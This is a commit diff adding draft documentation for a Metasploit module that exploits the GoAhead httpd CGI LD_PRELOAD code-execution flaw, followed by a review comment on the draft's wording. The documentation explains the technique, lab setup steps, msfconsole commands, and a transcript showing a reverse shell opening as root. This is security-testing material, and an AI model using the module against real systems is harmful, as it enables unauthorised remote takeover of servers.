Add a WIP of the module documentation
parent
1619a3fcf1
commit
b86fd551a3
@ -0,0 +1,61 @@
## Vulnerable Application

The GoAhead httpd server between versions 2.5 and 3.6.4 are vulnerable to an arbitrary code execution
vulnerability where a remote attacker can force a supplied shared library to be loaded into the process
of a CGI application. This module delivers a shared library payload as the raw data to a POST request
and forces this to be loaded by specifying a `LD_PRELOAD` value of `/proc/self/fd/0`.

### Kali 2017.3 and Ubuntu 16.04 Install Instructions

These instructions are based on the vulerability analysis by [elttam.com.au](https://www.elttam.com.au/blog/goahead/)

```
git clone https://github.com/embedthis/goahead.git
cd goahead/
git checkout tags/v3.6.4 -q
make > /dev/null
cd test
gcc ./cgitest.c -o cgi-bin/cgitest
sudo ../build/linux-x64-default/bin/goahead
```

## Verification Steps

Example steps in this format (is also in the PR):

1. Install the application
2. Start msfconsole
3. Do: ```use exploit/linux/http/goahead_cgi_exec```
4. Do: ```set rhost [ip]```
5. Do: ```exploit```
6. You should get a shell.

## Options

**TARGET_URI**

Optional. The full path to a CGI endpoint on the target server.

## Scenarios

### GoAhead 3.6.4 on Ubuntu 16.04 x64

```
[*] Processing goahead.rc for ERB directives.
resource (goahead.rc)> use exploit/linux/http/goahead_cgi_exec
resource (goahead.rc)> set verbose true
verbose => true
resource (goahead.rc)> set rhost 127.1.1.1
rhost => 127.1.1.1
resource (goahead.rc)> check
<TBD>
resource (goahead.rc)> exploit
[*] Started reverse TCP handler on 127.1.1.1:4444
[*] Sending Exploit to /cgi-bin/cgitest
[*] Command shell session 1 opened (127.1.1.1:4444 -> 127.1.1.1:45762) at 2017-12-23 17:12:39 -0500
uname -a
Linux goahead 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

whoami
root
```
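Review bot: the `check` step in the Scenarios transcript prints `<TBD>`, so the documentation ships with a placeholder where a reader expects the module's real check output; either capture the actual output from the Ubuntu 16.04 run or drop the `resource (goahead.rc)> check` and `<TBD>` lines until the check method is documented. Smaller points in the same file: `Example steps in this format (is also in the PR):` under Verification Steps is template text and should be removed; `vulerability` in the install section should read `vulnerability`, and `between versions 2.5 and 3.6.4 are vulnerable` reads better as `versions 2.5 through 3.6.4 are vulnerable`; the verification steps wrap commands in triple backticks where single backticks are the markdown convention for inline code, and the install block could carry a shell language tag on its fence. TARGET_URI is described as `Optional`, yet the scenario reaches `/cgi-bin/cgitest` without setting it, so the option text should state the default path or how the endpoint is chosen when the option is unset. The transcript also shows `root` only because the install instructions start `goahead` under `sudo`; a sentence noting that the resulting session has whatever privileges the CGI process runs with would stop readers from assuming root is typical.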